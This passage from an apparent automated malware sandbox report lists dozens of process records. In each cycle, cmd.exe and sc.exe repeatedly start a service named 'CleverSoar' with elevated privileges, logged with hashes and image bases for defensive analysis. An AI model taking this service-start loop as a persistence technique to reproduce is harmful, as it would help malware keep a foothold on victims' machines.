                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:31
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:32
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:34
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:35
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:36
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:37
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:38
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:39
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:40
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:41
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:42
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:43
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:44
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:45
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:46
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:47
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:48
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:49
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:50
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:51
                          Start time:07:11:45
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:52
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:53
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:54
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff632ac0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:55
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:56
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:57
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:58
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:59
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:60
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:61
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:62
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:63
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:64
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:65
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:66
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:67
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:68
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:69
                          Start time:07:11:46
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:70
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:71
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:72
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:73
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:74
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:75
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:76
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:77
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:78
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:79
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:80
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:81
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:82
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:83
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:84
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:85
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:86
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:87
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:88
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:89
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:90
                          Start time:07:11:47
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:91
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:92
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:93
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:94
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:95
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:96
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:97
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff623250000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:98
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6cb0c0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:99
                          Start time:07:11:48
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:100
                          Start time:07:11:48
                          Start date:24/12/2024
